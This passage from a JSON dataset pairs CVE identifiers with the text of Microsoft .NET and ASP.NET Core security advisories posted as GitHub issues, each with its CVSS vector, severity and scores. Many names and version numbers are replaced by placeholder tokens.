NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG respectively. The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Eric Scott URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-1597",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/162",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/162",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2020-08-11T17:08:44Z",
        "description": "Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24512",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/213",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/213",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2022-03-08T18:35:34Z",
        "description": "Microsoft Security Advisory CVETAG | .NET Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG | .NET Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A Remote Code Execution vulnerability exists in .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG where a stack buffer overrun occurs in .NET Double Parse routine. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET NUMBERTAG or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET NUMBERTAG NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 6.3,
        "impactScore": 3.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-1147",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/159",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/159",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2020-07-14T17:06:53Z",
        "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a remote code execution vulnerability exists in .NET software when the software fails to check the source markup of an XML file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to an ASP.NET Core application, or other application that parses certain types of XML. The security update addresses the vulnerability by restricting the types that are allowed to be present in the XML payload. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG Preview NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-0981",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/113",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/113",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2019-05-14T17:06:24Z",
        "description": "Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when .NET Core and ASP.NET Core improperly handle web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core and ASP.NET Core application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to a .NET Core application. The update addresses the vulnerability by correcting how .NET Core and ASP.NET Core web applications handle web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors There are no mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses the APITAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are part of .NET Core. If you are running a vulnerable version of .NET Core you may be affected. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG If your version of .NET Core does not support the APITAG command then you have either .NET Core NUMBERTAG or .NET Core NUMBERTAG installed. For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from URLTAG PATHTAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG Once you have installed the updated runtime or SDK you should restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime you must update your app, recompile and redeploy it for the update to take effect. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1075",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/373",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/373",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2019-07-09T17:01:09Z",
        "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Spoofing Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Spoofing Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a spoofing vulnerability that exists in ASP.NET Core that could lead to an open redirect. An attacker who successfully exploited the vulnerability could redirect a targeted user to a malicious website. To exploit the vulnerability, an attacker could send a link that has a specially crafted URL and convince the user to click the link. The update addresses the vulnerability by correcting how ASP.NET Core parses URLs. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any ASP.NET Core based application that uses any of following vulnerable packages: Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are part of .NET Core. If you are running a vulnerable version of .NET Core you may be affected. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed, you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG you need to install updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime, you must update your app, recompile and redeploy it for the update to take effect. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG respectively. The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgements Reported through Datalust External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-0980",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/112",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/112",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2019-05-14T17:04:45Z",
        "description": "Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when .NET Core and ASP.NET Core improperly handle web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core and ASP.NET Core application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to a .NET Core application. The update addresses the vulnerability by correcting how .NET Core and ASP.NET Core web applications handle web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors There are no mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses the APITAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are part of .NET Core. If you are running a vulnerable version of .NET Core you may be affected. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG If your version of .NET Core does not support the APITAG command then you have either .NET Core NUMBERTAG or .NET Core NUMBERTAG installed. For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from URLTAG PATHTAG For machines running .NET NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG Once you have installed the updated runtime or SDK you should restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime you must update your app, recompile and redeploy it for the update to take effect. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-1108",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/157",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/157",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2020-06-09T17:22:15Z",
        "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability Update]. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability which exists when .NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core application. APITAG update addresses the vulnerability by correcting how the .NET Core web application handles web requests. The previous update contained an incomplete fix, the runtime and SDK version numbers have now been updated to the runtimes and SDKs that have the complete fix. This new issue has been created for users which subscribe to the announcements via email or other automated means which may not show issue changes._ Discussion Discussion for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG Preview NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in [affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG For machines running .NET NUMBERTAG Preview you should download and install .NET NUMBERTAG Preview NUMBERTAG when available from FILETAG If you have multiple affected versions you must update the runtime or SDKs for each version. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG ersions that contain the patch updated NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8700",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/279",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/279",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2017-11-14T15:25:23Z",
        "description": "Reserved. APITAG issue has been reserved for a potential future security announcement._ This does not mean a security advisory is coming soon, it simply gives us the ability to predict the issue number that will be used in the future.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14359",
        "Issue_Url_old": "https://github.com/keycloak/keycloak/issues/12934",
        "Issue_Url_new": "https://github.com/keycloak/keycloak/issues/12934",
